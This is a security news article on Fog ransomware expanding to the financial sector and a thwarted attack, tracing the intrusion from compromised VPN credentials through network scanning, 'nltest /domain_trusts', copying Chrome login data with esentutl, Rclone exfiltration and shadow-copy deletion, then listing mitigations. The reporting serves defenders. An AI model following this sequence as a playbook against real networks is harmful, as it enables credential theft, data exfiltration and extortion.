Saturday, September 7, 2024
Homecyber securityFog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack

Fog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack

Published on

The Fog Ransomware group, known for targeting education and recreation sectors, has expanded its scope to attack financial services organizations, where the attackers exploited compromised VPN credentials to deploy the ransomware, targeting both Windows and Linux endpoints

It has detected the ransomware activity and isolated the affected machines, preventing data encryption and theft.

While the attack originated from IP addresses in Russia, this alone cannot definitively attribute the attack to a specific geographic location due to potential masking techniques.

- Advertisement - EHA

The Fog ransomware, a variant of STOP/DJVU, exploits compromised VPN credentials to infiltrate networks, primarily targeting education and recreation sectors.

After gaining administrative access, it disables security measures, encrypts VMDKs, and deletes backups, leaving victims with limited options. 

The ransomware, marked with extensions like ‘.FOG’ or ‘.FLOCKED’, demands a ransom via a Tor network platform.

Unlike traditional APT groups, Fog’s origin remains unattributed, suggesting a new, highly skilled threat actor.

The attackers began their network exploration by sending ping requests to various network devices and saving the results in text files named ‘pings.txt’ and ‘pingw.txt’. 

Using elevated privileges obtained from compromised service accounts, they then employed the ‘Advanced_Port_Scanner_2.5.3869(1).exe’ tool to scan network hosts for open ports and gather detailed information about their services, which allowed them to identify potential vulnerabilities and entry points into the network.

The Adlumin team discovered that a Russian IP address had compromised an unprotected system, initiating the attack, where the attackers exploited compromised service accounts and domain trust relationships to traverse the network. 

They executed the ‘nltest /domain_trusts’ command to gather information about domain trust relationships. Subsequently, they employed the ‘SharpShares.exe’ binary to map network drives and share folders on other devices, facilitating further lateral movement within the network.

Are You From SOC/DFIR Teams? - Try Advanced Malware and Phishing Analysis With ANY.RUN - 14 day free trial

The attacker used the `esentutl.exe` command-line tool to create a backup of login data stored in the Google Chrome user profile folder, which included encrypted credentials for various websites. 

The backup was saved to a temporary file in the same directory, allowing the attacker to potentially extract the credentials later using decryption techniques.

Indicator of Compromise
Indicator of Compromise

The attacker leveraged Rclone, a file transfer tool, to selectively sync recently modified data (excluding specific file types) from compromised systems. 

Next, they executed “locker.exe” with the “-id” switch, likely containing a unique identifier for the attack, where the “-target” switch specified a network share for data exfiltration. 

Finally, the attackers deployed WMIC and PowerShell commands to eliminate shadow copies, hindering file recovery from backups, which demonstrates a multi-pronged approach, combining data theft with encryption to pressure victims into paying the ransom. 

The security team identified and isolated endpoints compromised by a Fog ransomware attack and found malicious binaries and vulnerable endpoints that allowed unauthorized access. 

To mitigate risks, it has been recommended to implement MFA, update VPN software, monitor VPN access, automate endpoint isolation, use a comprehensive security platform, disable unnecessary services, regularly back up data, applying the principle of least privilege, conducting security audits, establishing incident response plans, and monitoring network traffic. 

What Does MITRE ATT&CK Expose About Your Enterprise Security? - Watch Free Webinar!

Latest articles

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...

NoiseAttack is a Novel Backdoor That Uses Power Spectral Density For Evasion

NoiseAttack is a new method of secretly attacking deep learning models. It uses triggers...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

BBTok Abuses Legitimate Windows Utility Command Tool to Stay Undetected

Cybercriminals in Latin America have increased their use of phishing scams targeting business transactions...

Predator Spyware Exploiting “one-click” & “zero-click” Flaws

Recent research indicates that the Predator spyware, once thought to be inactive due to...

Tropic Trooper Attacks Government Organizations to Steal Sensitive Data

Tropic Trooper (aka KeyBoy, Pirate Panda, and APT23) is a sophisticated cyberespionage APT group,...